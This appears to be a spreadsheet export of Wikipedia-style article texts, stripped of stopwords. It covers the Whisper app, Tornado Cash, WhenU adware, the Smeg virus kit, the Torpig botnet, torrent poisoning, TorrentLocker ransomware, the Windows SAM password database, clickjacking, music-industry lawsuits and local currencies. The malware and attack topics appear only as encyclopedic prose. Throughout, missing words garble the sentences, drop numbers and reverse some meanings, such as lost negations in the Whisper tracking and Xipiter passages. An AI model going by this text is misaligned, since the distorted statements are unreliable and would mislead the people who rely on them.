repercussions." described adweek, "this type social sharing, kind come back haunt you."whisper also used platform citizen journalism. june 2014, amid widespread violence unrest iraq iraqi government's blocking twitter, facebook, youtube, many iraqis downloaded used whisper means acting real-time reporters, posting news updates hours mainstream media, well sharing political views personal thoughts feelings. also used create text-based memes appeal generation internet users. according analytics firm sensortower, downloads rose 2021 large number social media users, mostly instagram, started using whisper create meme images. york times article "text memes taking over instagram", taylor lorenz wrote: "confessional, overly personal messages paired seemingly unrelated images allowed extra layer humor irony." technology development system outsourced inaka, mobile development consultancy based seattle, washington buenos aires, argentina. original system back used riak nosql database, performance problems riak system converted mysql apache cassandra. since 2013, whisper brought technology team in-house. whisper engineers venice, ca.in march 2016, fast company reported whisper recently begun deep learning build content moderation tool, internally dubbed arbiter. article stated arbiter runs 128gb four nvidia geforce titan graphics cards, graphics processing unit 3072 computing cores 12gb ram. those gpus enable perform artificial intelligence neural network technology assess incoming whispers. article noted whisper's arbiter knowledge "reflect real things millions whisper users said moderators handled them, understanding language remarkably subtle." according angeles times, whisper also using technology create content. that system, times reports, "allows whisper gather related posts issues work, school relationships. then, organizes them, adds context even writes headline... with ai's help, whisper hopes produce content humans alone could turn could mean readership revenue."in march 2017, techcrunch reported whisper launched tool publishers called "perspectives," video widget publishers, primarily news websites, embed within articles feature whisper content. videos consist series whispers relevant video clips instrumental background music. selection whispers include perspectives video story done in-house proprietary program called "eliot." according techcrunch, "eliot takes structured unstructured data scanned company's website identifies topics, places people associated story... engine generates contextually relevant story video." corporate company, whispertext llc, michael heyward, based venice tech angeles, california, known "silicon beach," company offices york city well.whispertext received first round venture-capital funding lightspeed venture partners million april 2013, second round funding sequoia capital, trinity capital, krum capital, lightspeed million september 2013. pitchbook, independent private equity venture capital research firm, forecasted november 2013 whisper likeliest social platform ipos, pre-money valuation million. according malik, founder senior writer gigaom, whisper already, july 2013, valued $100 million. 2014, whisper confirmed raised additional million venture funding shasta ventures, sequoia capital, thrive capital, lightspeed ventures. whisper raised million total venture capital funding. whisper parts advertising business: direct sales advertising clients, programmatic show user's phone whisper app. whisper experimented advertising working studios, mtv, universal, hulu customized branded campaigns. september 2015, adweek revealed coca-cola using whisper market #makeithappy anti-cyberbullying campaign whisper's users. late 2015, whisper embarked advertising partnership disney pixar, starting promotion animated movie good dinosaur. february 2016, mashable teen vogue announced whisper partnered giphy allow gifs chat section platform. april 2016, launched whisper polls, whereby brands question potential consumers, users, various types opinions, preferences, interests. also planning start interacting directly users "cards" feature, prompting users post specific topics. april 2016, whisper featured discussion howard stern show, howard co-host robin talked confessions victims domestic violence hands wives.in february 2016, whisper also announced launch spanish-language version android devices, initial launch mexico, march, whisper partnered gets better project mexico (todo mejora méxico) campaign empower lgbtq voices mexico.in june 2016, whisper announced would introducing video ads, started july partnership universal studios' promote movie secret life pets. whisper said would share popular posts facebook page, reportedly reached million people.in june 2016, whisper also added "groups" function, allows users curate whispers different topics, connect users shared interests.in february 2017, whisper announced partnership promote series little lies, also embarked promotional partnerships dove soap universal music group.in 2017, partnered whisper promote 2017 movie awards. that month, tronc media company, publishes angeles times chicago tribune, began using whisper's content widget websites. controversy whisper criticized requiring access smartphone features camera user's contact list, disclosed downloaded android platform.in 2015, 15-year-old girl bolton, massachusetts charged making threat whisper towards school, referencing columbine shootings; tracked using whisper gps.in july 2018, 31-year-old toronto, ontario, canada allegedly 15-year-old girl using whisper charged luring child, counts sexual assault charges, including possession child pornography. privacy policy company's privacy policy reveals turn information case requests enforcement order comply applicable laws enforceable government requests subpoena. electronic frontier foundation's attorney hanni fakhoury commented early 2014 whisper legal choice matter, "it's doublespeak that's problematic." fakhoury elaborated that: "you careful selling program secure secretly communicate, reserve right turn information whenever necessary." guardian allegations october 2014, guardian newspaper alleged that: whisper retains every user's posts indefinitely central database (including "deleted" posts), together post's timestamp approximate geolocation, even user opted geolocation; whisper allegedly stores processes user information outside united states despite told users process store information united states". whisper said outsourcing firm content moderation based philippines, data stored outside whisper allegedly provides data gathers (including geolocation data) fbi, mi5. whisper participated project suicide prevention sharing aggregate mentions certain words military bases.whisper disputed nearly guardian allegations made point-by-point response guardian. after reading whisper's response, twitter's former security head moxie marlinspike commented hacker news whisper "should never claimed provide anonymity track users make function". pointed many "hard problems" need solved service claim provide truly unlinkable anonymity, "there projects like approaching types problems seriously, apps like whisper secret poisoning well confusing users". according marlinspike, whisper claiming could track users, instead "squarely [would not] category".on october 2014, u.s. senator rockefeller asked whisper's appear staff senate committee commerce, science, transportation explain whisper's tracking systems, tracking data retention, data distribution. buzzfeed, huffington post fusion channel) suspended partnerships whisper.in march 2015, guardian published clarification october 2014 piece made numerous allegations whisper's privacy protection metadata policy. guardian clarified claims regarding user location, data storage, changes whisper's terms service security policy sharing user data department defense. also removed opinion piece titled "think whisper privately? think again." retraction covered several news outlets, including wall street journal, money, techcrunch, mashable. xipiter report march 2015, security startup called xipiter published report outlined serious security concerns resistance trying bring concerns attention whisper.sh. they claimed could hijack user's account, post (publicly privately) hijacked user, view user's current past private messages. response, whisper's co-founder michael heyward chad depue claimed possible things accused xipiter fabricating proof-of-concept video. xipiter's claims validated disproved independent security researchers. your voice whisper text claims companion nonprofit users called your voice, which, according website, "dedicated raising awareness mental health issues college campuses". site claims provide resources support college students dealing depression, anxiety, eating disorders, sexuality lgbtq issues, bullying, suicide prevention, stress management. website provides links various services organizations, offers services own. contact telephone number website call help national suicide prevention lifeline, funded u.s. department health human services. also anonymous social media postsecret secret (app) guardian project (software) (anonymity network) references external links official website</t>
  </si>
  <si>
    <t>Tornado Cash</t>
  </si>
  <si>
    <t>tornado cash open source, non-custodial, fully decentralized cryptocurrency tumbler runs ethereum virtual machine compatible networks. offers service mixes potentially identifiable "tainted" cryptocurrency funds others, obscure trail back fund's original source. this privacy tool used networks transactions public default. august 2022, office foreign assets control u.s. department treasury blacklisted tornado cash, making illegal citizens, residents companies receive send money service. treasury accused laundering billions dollars virtual currencies, including $455 million believed stolen 2022 lazarus group, hacking group associated government north korea.the day, domain used project taken github removed tornado cash repository suspended developers accounts.circle, company behind coin, froze ethereum addresses belonging mixer infura alchemy, used platforms offer endpoints connect blockchain networks blocked access interact tornado cash smart contracts.on 10th august 2022, suspected tornado cash developer arrested amsterdam. references also blender.io external links tornado cash homepage (not working anymore) tornado cash blog</t>
  </si>
  <si>
    <t>WhenU SaveNow</t>
  </si>
  <si>
    <t>whenu save/savenow (commonly referred simply whenu savenow), developed company whenu, piece advertising software generally considered adware spyware. program delivers advertisements, compares shopping results offers users' computers, tracks browsing habits. whenu typically installed applications, ostensibly support free existence applications. whenu cannot installed without user reading disclosure screen clicking accept" "next" give consent, sometimes unknowingly. this model similar previous software known gator company known claria corporation. security concerns although whenu's advertising software declares poses risk harm users' computers, considered many unwelcome serves pop-up advertisements slows computer. lavasoft's ad-aware computer associates' pestpatrol briefly de-listed whenu adware target february 2005. programs stopped detecting whenu continuing target similar adware programs speculation reasoning. whenu added back lavasoft's detection list month later.truste included whenu's advertising software whitelist certified software. also 1-800 contacts, inc. whenu.com, inc. references</t>
  </si>
  <si>
    <t>Smeg Virus Construction Kit</t>
  </si>
  <si>
    <t>smeg virus construction smeg) polymorphic engine written virus writer chris pile, known black baron. smeg acronym simulated metamorphic encryption generator. messages within viruses pile created smeg.pathogen smeg.queeg, suggest also allusion word smeg, used profanity characters british series dwarf. engine designed used polymorphism viruses. 1995, pile sentenced months prison creating viruses, becoming first person convicted computer misuse act. references also timeline notable computer viruses worms comparison computer viruses computer viruses polymorphic code virus creation laboratory</t>
  </si>
  <si>
    <t>Toronto dollar</t>
  </si>
  <si>
    <t>toronto dollar paper local currency used toronto, ontario 1998-2013. fixed exchange rates canadian dollar. lower exchange rate used trading toronto dollars canadian dollars vice versa, income disparity used fund social benefit programs. description toronto dollar, founded december 1998, paper local currency used ontario. fixed exchange rate canadian dollar. family life foundation willowdale—a registered canadian charity—then chaired rev. lindsay king (minister willowdale united church) sponsors toronto dollar system. rev. king present founding toronto mayor, lastman, bought first toronto dollar.the currency administered toronto dollar community projects inc., not-for-profit community group, project lawrence works. currency purchased anyone number locations 1-for-1 rate. local businesses agree accept currency canadian dollar. merchants free exchange toronto dollars canadian dollars twice month, rate cents dollar.as 2008, little businesses accepted toronto dollar; lawrence market gerrard square. charity poverty reduction toronto dollar varies local currencies funds used purchasing redeeming currency allocated benefit community initiatives groups, particularly incomes, unemployed homeless. 2008, toronto dollar helped raise donate $110,000 local charities, given grants least different organizations.the toronto dollar also provides incentive productivity welfare recipients: toronto dollars given gifts welfare recipients perform volunteer work charitable non-profit organizations, gifts affect welfare benefits. discontinuation 2012/2013 group announced "toronto dollar organization suspend sales toronto dollars lack volunteers lack infrastructure support work."a current lack online presence toronto dollar program indicates currency likely poised revival. several articles various periods, late 2013 downturn issuing usage currency, seemingly confirm theory. update status program currency seems available internet time. also list canadian community currencies references external links toronto dollar</t>
  </si>
  <si>
    <t>Torpig</t>
  </si>
  <si>
    <t>torpig, also known anserin sinowal type botnet spread systems compromised mebroot rootkit variety trojan horses purpose collecting sensitive personal corporate data bank account credit card information. targets computers microsoft windows, recruiting network zombies botnet. torpig circumvents antivirus software rootkit technology scans infected system credentials, accounts passwords well potentially allowing attackers full access computer. also purportedly capable modifying data computer, perform man-in-the-browser attacks. november 2008, estimated torpig stolen details 500,000 online bank accounts credit debit cards described "one advanced pieces crimeware ever created". history torpig reportedly began development 2005, evolving point effectively evade detection host system antivirus software.in early 2009, team security researchers university california, santa barbara took control botnet days. during time, extracted unprecedented amount (over stolen data redirected million private command control server. report goes great detail botnet operates. during ucsb research team's ten-day takeover botnet, torpig able retrieve login information 8,310 accounts different institutions, 1,660 unique credit debit card numbers victims u.s. (49%), italy (12%), spain (8%), countries, including cards visa (1,056), mastercard (447), american express (81), maestro (36), discover (24). operation initially, great deal torpig's spread attributable phishing emails tricked users installing malicious software. more sophisticated delivery methods developed since time malicious banner take advantage exploits found outdated versions java, adobe acrobat reader, flash player, shockwave player. type drive-by download, method typically require user click download commence without visible indications malicious recognizes software version redirects browser torpig download site. complete installation infected computer's master boot record (mbr), trojan restart computer.during main stage infection, malware upload information computer twenty minutes time, including financial data like credit card numbers credentials banking accounts, well e-mail accounts, windows passwords, credentials, pop/smtp accounts. also mebroot drive-by download phishing man-in-the-browser conficker worm also uses domain name generation domain flux) timeline computer viruses worms references further reading taking torpig botnet, ieee security privacy, jan/feb 2011 external links ucsb analysis sinowal trojan gang hundreds thousands compromised accounts fraudaction research lab, october 2008 don't victim sinowal, super-trojan woody leonhard, windowssecrets.com, november 2008 antivirus tools remove sinowal/mebroot woody leonhard, windowssecrets.com, november 2008 torpig botnet hijacked dissected covered slashdot, 2009 steal botnet what happen when richard kemmerer, googletechtalks, september 2009</t>
  </si>
  <si>
    <t>Torrent poisoning</t>
  </si>
  <si>
    <t>torrent poisoning intentionally sharing corrupt data data misleading file names using bittorrent protocol. this practice uploading fake torrents sometimes carried anti-infringement organisations attempt prevent peer-to-peer (p2p) sharing copyrighted content, gather addresses downloaders. methods attack decoy insertion decoy insertion content pollution) method corrupted versions particular file inserted network. this deters users finding uncorrupted version also increases distribution corrupted file. malicious user pollutes file converting another format indistinguishable uncorrupted files (e.g. similar metadata). order entice users download decoys, malicious users make corrupted file available high bandwidth connections. this method consumes large amount computing resources since malicious server must respond large quantity requests. result, queries return principally corrupted copies blank file executable files infected virus. there known cases company created special version game published file sharing services advertising cracked, undocumented hidden functionality, making impossible variant game. index poisoning this method targets index found file sharing systems. index allows users locate addresses desired content. thus, method attack makes searching difficult network users. attacker inserts large amount invalid information index prevent users finding correct resource. invalid information could include random content identifiers fake addresses port numbers. when user attempts download corrupted content, server fail establish connection large volume invalid information. users waste time trying establish connection bogus users thus increasing average time takes download file. index poisoning attack requires less bandwidth server resources decoy insertion. furthermore, attacker transfer files respond requests. reason, index poisoning requires less effort methods attack. spoofing some companies disrupt file sharing behalf content providers create software order launch attacks. mediadefender written program directs users non-existent locations bogus search results. users typically select five search results only, method requires users persevere beyond initial failed attempts locate desired file. idea many users simply give search frustration. interdiction this method attack prevents distributors serving users thus slows file sharing. attacker's servers constantly connect desired file, floods provider's upstream bandwidth prevents users downloading file. selective content poisoning selective content poisoning (also known proactive discriminatory content poisoning) attempts detect copyright violators allowing legitimate users continue enjoy service provided open network. protocol identifies peer endpoint address file index format changed incorporate digital signature. peer authentication protocol establish legitimacy peer downloads uploads files. using identity based signatures, system enables peer identify infringing users without need communication central authority. protocol sends poisoned chunks detected users requesting copyright protected file only. legitimate users simply deny download requests known infringers, latter usually accumulate clean chunks colluders (paid peers share content others without authorization). however, method content poisoning forces illegitimate users discard even clean chunks, prolonging download time.voluntary collective licensing open music model theoretical systems users subscription access file-sharing network, able legally download distribute copyright content. selective content poisoning could potentially used limit access legitimate subscribed users, providing poisoned content non-subscribed users attempt illegitimately network. eclipse attack eclipse attack (also known routing-table poisoning), instead poisoning network, targets requesting peers directly. attack, attacker takes peer's routing table unable communicate peer except attacker. attacker replicates whole network targeted peer, manipulate number ways. example, attacker specify search results returned. attacker also modify file comments. peer's requests also directed back network attacker also modified. also checks data randomly errors found that. uncooperative-peer attack attack, attacker joins targeted swarm establishes connections many peers. however, attacker never provides chunks (authentic otherwise) peers. common version attack "chatty peer" attack. attacker establishes connection targeted peers required handshake message, followed message advertising number available chunks. attacker never provide chunks, also repeatedly resend handshake message. these attacks prevent downloads essentially, peer wastes time dealing attacker, instead downloading chunks others. barriers torrent poisoning there several reasons content providers copyright holders choose torrent poisoning method guarding content. first, injecting decoys, content providers normally monitor bittorrent network signs content illegally shared (this includes watching variations files files compressed formats). this process expensive time-consuming. result, poisoning continued first months following leak release. second, also unlikely torrent poisoning successful disrupting every illegal download. instead, content providers make illegal downloads statistically less likely clean complete, hope users discouraged illegally downloading copyright material. content providers copyright holders decide financial outlay worth result efforts. countermeasures methods attack described particularly effective own, measure effective countermeasures evolved. these measures must combined order significant impact illegal peer-to-peer filesharing using bittorrent protocols torrent files. bittorrent highly resistant content poisoning opposed index poisoning), able verify individual file chunks. overall, bittorrent resistant filesharing methods poisoning. private tracker websites, posted torrents traced particular member, poisoned torrents quickly labeled deleted poster banned, preventing introduction poisoned torrents user. public torrent tracker sites enabled ability report torrent poisoned fake malicious way). thus torrent files shared public trackers similar levels quality assurance private tracker websites. tracker technology well bittorrent client programs) improved time, many kinds spoofing possible past longer possible. bittorrent exclusively tcp-ip protocol, longer true. udp, protocol made middle attacks difficult nearly impossible. public private tracker websites selectively switched using https distribution text image content. using https website content (versus tracker communications) many poisoning techniques rendered impossible. legal issues september 2004, altnet sued recording industry association america, overpeer, loudeye, mediasentry others, claiming spoofing services violated altnet's patent file identification method called truenames.in 2005 finnish anti-infringement organisation viralg claimed software, uses similar approach spoofing, could used bring illegal file sharing. firm offered "total blocking peer peer sharing intellectual property" claimed "patented virtual algorithm blocks illegal swapping data". well claiming approach effective. despite claims, algorithm tested bittorrent. group finnish musicians requested investigation company, arguing software effectively virus violation finnish law. investigation declined finnish police, later finnish parliamentary ombudsman.in jurisdictions, concerns content providers copyright holders engaging poisoning activities held liable damages users' computers. 2002, representative howard berman proposed peer peer piracy prevention act, would granted immunity copyright holders taking steps prevent illegal distribution content (i.e. poisoning activities) networks, long harm files stored user's computer. however, bill died later 2002 congressional term ended reintroduced. high-profile cases 2005, reported poisoning torrents show rome providing chunks garbage data users. also reported sent cease-and-desist letters internet service providers (isps) downloaders believe illegally downloaded episodes sopranos. although targeted specifically bittorrent, madonna's 2003 album american life early example content poisoning. before release album, tracks appeared similar length file size real album tracks leaked singer's record label. tracks featured clip madonna saying "what fuck think doing?" followed minutes silence.similarly, band barenaked ladies released number tracks online 2000 appeared legitimate copies tracks band's latest album. each file contained short sample song, followed clip band member saying, "although thought downloading single, actually downloading advertisement album.”after unauthorized copy michael moore's movie sicko uploaded online, became websites pirate bay. mediadefender hired poison torrents using decoy insertion.in example internet vigilantism, anti-infringement vigilantes known create viruses distributed exclusively networks, designed attack mp3s music files stored user's nopir-b worm, originated france, poses copying program deletes files user's computer, regardless whether legally obtained.on october 2007 associated press (ap) released information accusing broadband service provider comcast "hindering" file sharing traffic. tests conducted shown comcast hindered uploading complete files bittorrent. federal communications commission conducted public hearings response allegations. comcast argued regulating network traffic enable reasonable downloading times majority users. august 2008 issued order stated comcast's network management unreasonable comcast must terminate discriminatory network management year. comcast complied order appealed. june 2010, district court appeals columbia vacated order comcast corp. fcc. also legal issues bittorrent peer-to-peer file sharing privacy file sharing networks references external links attacking networks</t>
  </si>
  <si>
    <t>TorrentLocker</t>
  </si>
  <si>
    <t>torrentlocker ransomware trojan targeting microsoft windows. first observed february 2014, least five major releases made available december 2014. malware encrypts victim's files similar manner cryptolocker implementing symmetric block cipher encrypted asymmetric cipher.torrentlocker scans system programs files, conceals contents encryption leaving ransom instructions victim done, decryption ransom. operator demands victim amount usually starts around us$550 within days. victim told amount bitcoins, sent unique bitcoin address differs infected user. also cryptolocker command control (malware) cyber spying bitcoin dominance identity theft malvertising phishing targeted threat references</t>
  </si>
  <si>
    <t>Security Account Manager</t>
  </si>
  <si>
    <t>security account manager (sam) database file windows windows vista, windows 8.1, stores users' passwords. used authenticate local remote users. beginning windows 2000 sp4, active directory authenticates remote users. uses cryptographic measures prevent unauthenticated users accessing system. user passwords stored hashed format registry hive either hash ntlm hash. this file found %systemroot%/system32/config/sam mounted hklm/sam system privileges required view attempt improve security database offline software cracking, microsoft introduced syskey function windows 4.0. when syskey enabled, on-disk copy file partially encrypted, password hash values local accounts stored encrypted (usually also referred "syskey"). enabled running syskey program. cryptanalysis 2012, demonstrated every possible 8-character ntlm password hash permutation cracked hours. 2019, time reduced roughly hours using modern hardware.in case online attacks, possible simply copy file another location. file cannot moved copied windows running, since windows kernel obtains keeps exclusive filesystem lock file, release lock operating system shut "blue screen death" exception thrown. however, in-memory copy contents dumped using various techniques (including pwdump), making password hashes available offline brute-force attack. removing hash hash compromised protocol replaced ntlm hash. most versions windows configured disable creation storage valid hashes user changes password. windows vista later versions windows disable hash default. note: enabling setting immediately clear hash values sam, rather enables additional check password change operations instead store "dummy" value location database hash otherwise stored. (this dummy value relationship user's password value used user accounts.) related attacks windows 3.51, 2000, attack devised bypass local authentication system. file deleted hard drive (e.g. mounting windows volume alternate operating system), attacker could account password. this flaw corrected windows shows error message shuts computer. however, exist software utilities, which, aforementioned methodology using either emulated virtual drive, boot disk (usually unix/linux, another copy windows like windows preinstallation environment) based environment mount local drive housing active ntfs partition, using programmed software routines function calls within assigned memory stacks isolate file windows system installation directory structure (default: %systemroot%/system32/config/sam) and, depending particular software utility used, removes password hashes stored user accounts entirety, cases, modify user account passwords directly environment. this software highly pragmatic beneficial password clearing account recovering utility individuals lost forgotten windows account passwords, well possible malicious software security bypassing utility. essentially granting user enough ability, experience, familiarity cracking utility software security routines windows kernel well offline immediate local access target computer) capability entirely bypass remove windows account passwords potential target computer. only recently, microsoft released utility called locksmith, part msdart. msdart freely available end-users, however. july 2021 revealed vulnerability within windows windows allowed privileged users access sensitive registry database files including file. also chntpw password file references</t>
  </si>
  <si>
    <t>Totnes pound</t>
  </si>
  <si>
    <t>totnes pound (t£) complementary local currency, intended support local economy totnes, town devon, england. circulation march 2007 june 2019, discontinued partly increasingly cashless economy. history group argued "economic localisation considered aspect transition process, local currency systems provide opportunity strengthen local economy whilst preventing money leaking out". developed hopkins naresh giangrande scheme partly modelled berkshares.the initiative part transition towns concept, totnes pioneer. according transition town totnes website, meant totnes community process imagining creating future addresses twin challenges diminishing supplies climate change, creates kind community would want part of".the anticipated benefits totnes pound were: build resilience local economy keeping money circulating community building relationships people thinking talking spend money encourage local trade thus reduce food trade miles encourage tourists local businesseson june 2019 totnes pound closed, declining usage caused partly rise cashless society. value usage totnes pound equal pound sterling backed sterling held bank account. totnes pound re-launched june 2014 denominations t£1, t£5, t£10 t£21. final designs featured author mary wesley, 'father computer' charles babbage, musician howard social activist philanthropist dorothy elmhirst.as july 2014, businesses totnes accepting totnes pound, £12,000 worth currency issued. description notes paper totnes pounds printed plasticised paper number security features including: watermarks, hologram, engraved silver foil iridescent ink. also chiemgauer germany lewes pound list community currencies united kingdom stroud pound "the wörgl experiment" using stamp scrip local currency references</t>
  </si>
  <si>
    <t>Toxbot</t>
  </si>
  <si>
    <t>toxbot computer worm primarily active 2005. infected computers, opened backdoor allow command control network, thus creating botnet peak comprised million computers. makers botnet arrested october 2005 received jail sentences months dutch court. references external links w32.toxbot symantec security response win32/toxbot toxbot f-secure</t>
  </si>
  <si>
    <t>SecureSafe</t>
  </si>
  <si>
    <t>securesafe cloud based software-as-a-service password safe, document storage digital spaces online collaboration. service developed based principles security design privacy design. data centers securesafe stores customers’ data three data centers using triple redundancy mirroring. first data center dedicated production, second standby third acts so-called disaster recovery center. first data centers located greater area zürich company interxion. third center located former military bunker mountains central switzerland. features password manager password manager used store passwords. passwords stored securesafe protected aes-256 rsa-2048 encryption. file storage file storage cloud storage used store files online. 2-factor authentication login method 2-factor authentication also known e-banking systems. works sending one-time code user’s mobile every time logs given online account. even hacker user’s login data, information useless without additional security code. data rooms data rooms digital spaces groups people share data online. data inheritance data inheritance digital inheritance enables customers pass important digital assets others. among digital assets people pass login criteria online accounts, insurance legal documents photo collections. references external links official website</t>
  </si>
  <si>
    <t>Social jacking</t>
  </si>
  <si>
    <t>social jacking malicious technique tricking users clicking vulnerable buttons compromise showing false appearing pages, mixture click jacking technique breach browser security social engineering. also referred user interface disguising method, variant click jacking method. technique original page vulnerable page loaded using iframe tag, unnecessary contents webpage displayed iframe removed placing white background elements using absolute positioning property using css, thus unnecessary information displayed vulnerable page removed buttons links alone made visible user, additional social engineering messages like click button access reward displayed iframe tag, user made click visible button without knowing happens clicks button. examples suppose user logged based email, send link user tricked webpage, user clicks link tricked specially crafted webpage loaded, loaded webpage iframe users based email inbox loaded hide unnecessary information loaded webpage make "delete all" button inbox page visible, text iframe saying messages makes user click delete button, user clicks delete button mails deleted prevention prevention methods quite tough, user identifying analyzing webpages click anonymous links buttons implementation social jacking easily implemented using google toolkit, design webpage using wysiwyg builder drag white background colored panel iframe window thus hiding unnecessary information, revealing vulnerable buttons alone. also social engineering clickjacking browser security internet safety internet security cross-site scripting phishing references</t>
  </si>
  <si>
    <t>Trackbuster</t>
  </si>
  <si>
    <t>trackbuster online service used identify remove email trackers.email tracking mainly used beginning marketers monitor delivery emails. however, tools allow individuals track emails easily, practice rise. addition revealing whether email opened not, email trackers also reveal one’s software configuration geographic location (through geolocation). trackbuster helps email users trackers, detecting disabling tracking images tracked links. launch, trackbuster received praise positive press well-known figures tech world, including robert scoble, malik chris messina. trackbuster currently compatible gmail google apps. references</t>
  </si>
  <si>
    <t>Trade group efforts against file sharing</t>
  </si>
  <si>
    <t>arts media industry trade groups, international federation phonographic industry (ifpi) motion picture association america (mpaa), strongly oppose attempt prevent copyright infringement file sharing. organizations particularly target distribution files internet using peer-to-peer software. efforts trade groups curb infringement unsuccessful chronic, widespread rampant infringement continuing largely unabated. rationale trade groups also claim widespread copyright infringement internet hurts sales, turn affecting artists depend royalties. various economic studies support claims, always degree trade groups report. other studies show mixed effects, sometimes overall social "welfare" benefits. actions internet service providers march 2007, irish recorded music association (irma) members sued eircom, largest broadband provider ireland, alleged illegal file sharing subscribers. irma previously demanded eircom install content filters take steps block irma's copyrighted music shared.in november 2008, group film television studios (including village roadshow, warner brothers, sony pictures, disney seven network), represented australian federation against copyright theft (afact) launched action federal court australia iinet, australia's third-largest internet service provider. afact alleged iinet customers breached members' copyright using peer-to-peer software share download films television programs, iinet acted alleged file-sharers despite notifications copyright infringement. federal court found case. case taken appeal high court australia dismissed unanimously, finding iinet "had direct technical power" stop users downloading copyrighted material illegally. actions file sharing services litigation riaa first noticed internet sites offering unauthorized recordings early 1997, organization began sending cease-and-desist letters operators sites, leading voluntary shutdowns some.in mid-1997, riaa took recording industry's first collective legal action online file-sharing music, filing copyright infringement claims operators three u.s.-based file-sharing sites. each case could resulted statutory damage award million, three settled out-of-court permanent injunctions january 1998.in 1998, riaa sued operators sites, resulting permanent injunctions monetary damage awards defendants, also required perform community service.in late 1999, riaa labels sued napster providing peer-to-peer file sharing network files. plaintiffs claimed napster "facilitate[d] piracy music unprecedented scale." napster became bankrupt case; since taken roxio provides download service sanctioned riaa. 2002, riaa sued aimster, provided similar service. 2003, mpaa studios sued grokster file sharing services case would eventually supreme court united states. court held producers technology could held liable intent induce infringement. 2006, riaa labels sued developers limewire, client gnutella file sharing network. support police actions controversial 2006 raid, swedish national bureau investigation local police seized servers bittorrent tracker pirate bay, causing three-day outage. raid appeared motivated pressure motion picture association america (mpaa), group filed police complaints stockholm gothenborg 2004 2005 pirate sent letter sweden's state secretary requesting action. raid publicized success mpaa, ridiculed pirate bay's operators. 2006 raid detailed documentary steal this film.in january 2012, hong kong-based file sharing website megaupload discovered hosted servers state virginia, allowing government take action january website shut founder, dotcom, along four others involved website, arrested. indictment issued claims megaupload cost copyright holders $500 million facilitation illegal downloads. mpaa requested carpathia, megaupload's server host, retain megaupload's petabytes data case mpaa decided megaupload copyright infringement. while data includes information 66.6 million megaupload users, mpaa stated interested identities individual users. peer-to-peer spoofing riaa apparently past revealed admitted practice spoofing, deliberately flooding networks "junk music". reference activity discovered computer software source code along emails stolen company "media defender"; software designed facilitate "interdiction" known peer-to-peer file sharing networks. contents emails made clear network monitoring interdiction undertaken media defender. denial-of-service attacks aiplex software, india-based technology company, revealed 2010 made denial-of-service attacks torrent hosting websites behalf movie studios. internet activists retaliated aiplex industry trade groups denial-of-service attacks own, coordinated operation payback. lawsuits individuals from 2005 2008, recording industry association america (riaa) lawsuits individual consumers combat problem internet-based copyright infringement. riaa president cary sherman claimed large number lawsuits filed "arrested growth runaway solution would grown worse worse." july 2006, riaa brought lawsuits 20,000 people united states suspected distributing copyrighted works. yet, 2008, album sales continued decline 1999 peak. participating plaintiffs riaa brought file sharing lawsuits individuals naming following plaintiffs. labels: capitol records, priority records, virgin records sony labels: arista records, bertelsmann music group, laface records, sony records, zomba label group universal music group labels: interscope records, loud records, motown records univision labels: fonovisa records warner music group labels: atlantic records, elektra records, lava records, london-sire records, maverick records, warner bros. recordsthe mpaa brought file sharing lawsuits individuals naming following plaintiffs. lions gate entertainment news corporation studios: 20th century paramount pictures sony pictures studios: columbia pictures, metro-goldwyn-mayer, screen gems time warner studios: line cinema, warner bros. universal studios walt disney company scope distribution rights critical case, determine fate riaa's litigation campaign, also impact scope copyright across internet, elektra barker. case, tenise barker, 29-year-old nursing student bronx, moved dismiss riaa's complaint lack specificity, ground merely "making available" constitute copyright infringement. opposing barker's motion, riaa argued "making available" indeed copyright infringement. upon learning riaa's argument, sought expand copyright law, computer communications industry association, u.s. internet industry association, electronic frontier foundation (eff) submitted amicus curiae briefs supporting barker's motion rebutting riaa's argument. motion picture association america, turn, submitted brief supporting riaa. u.s. department justice submitted "statement interest" refuting argument made eff, taking position "making available" issue; stated never prosecuted anyone "making available". case argued judge kenneth karas manhattan federal court january 2007. issue briefed recent case, warner cassin. march 2008, judge karas ruled "barker" simply "making available" (such dropping file shared folder) constitute copyright infringement. amnesty programs between september 2003 april 2004, riaa, clean slate program, offered individual file sharers amnesty past infringements, condition refrain future infringement," delete infringing material. individuals longer eligible amnesty sued. program discontinued. riaa states educational initiative illegal file sharing, stopped increased public awareness issues. program also stopped number takers.there doubt whether riaa offer protection, attorneys claiming offer amnesty misleading, legal documents provided riaa "provides promise you."a lawsuit brought california state court, parke riaa, alleged riaa committed fraudulent business practices offering program. collection evidence riaa mpaa contracted mediasentry, behalf plaintiff labels studios, collect information addresses sharing potentially infringing files peer-to-peer networks. collected information included lists potentially infringing files address reports available downloading, files actually downloaded mediasentry address, dates times observations. united states, mediasentry licensed private investigator states observed files physically located. because this, beginning february 2008, defendants challenged legality mediasentry's practices, seeking exclude evidence collected mediasentry lawsuits, filing complaints state licensing boards. riaa asserted mediasentry private investigator, require licensing jurisdiction. nevertheless, sometime 2008 riaa quietly discontinued using mediasentry's services. february 2008 redesign mediasentry's website removed section "litigation support services" described "gathering evidence civil/criminal litigation prosecution". early settlement offers february, 2007, riaa launched 'early settlement program' directed isp's colleges universities, urging pass along letters subscribers students offering early "settlements", prior disclosure identities. when accepted, offers save riaa expense procure identities lawsuit naming multiple defendants. settlement letters urged isp's preserve evidence benefit riaa invited students subscribers visit riaa website purpose entering "discount settlement" payable credit card. march 2007, focus shifted isp's colleges universities.the average settlement amount offered riaa around $3,000, depends number infringements case 2008, berkeley students informed riaa's lawfirm infringing copyrights limewire. they offered settlement $750 song order avoid legal action. identification defendants between 2002 2003, riaa attempted verizon disclose identities file-sharing customers based simple one-page subpoena. verizon attorney sarah deutsch challenged subpoena's validity procedural privacy grounds. december 2003, failed federal appeals court overturned lower court order. riaa claims procedure sanctioned digital millennium copyright act, appeals court ruled dmca regulation applies data actually hosted internet service provider, rather data customer's computer. united states supreme court declined review ruling 2004. result, riaa must file individual civil suits accused file-sharer, alleged file-sharer legal avenues preventing disclosure identity, making entire process much expensive, slow complicated. court opinion written judge douglas ginsburg. riaa typically files suits multiple does. riaa names defendants based identification subscriber associated address, know additional information person sue. after internet subscriber's identity discovered, individual lawsuit filed, subscriber typically offered opportunity settle. standard settlement payment several thousand dollars riaa, agreement engage file-sharing riaa music. electronic frontier foundation, american civil liberties union public citizen oppose ability riaa companies "strip internet users anonymity without allowing challenge order court".the riaa's methods identifying individual users issuing subpoenas dead grandmother, elderly computer novice, even without computer all. riaa also brought lawsuits children, young 12.the riaa looks various colleges universities throughout united states biggest offenders peer peer file sharing. found california colleges universities received pre-litigation letters copyright infringement notices.in 2005, patricia santangelo made news challenging riaa's lawsuit her. while succeeded getting 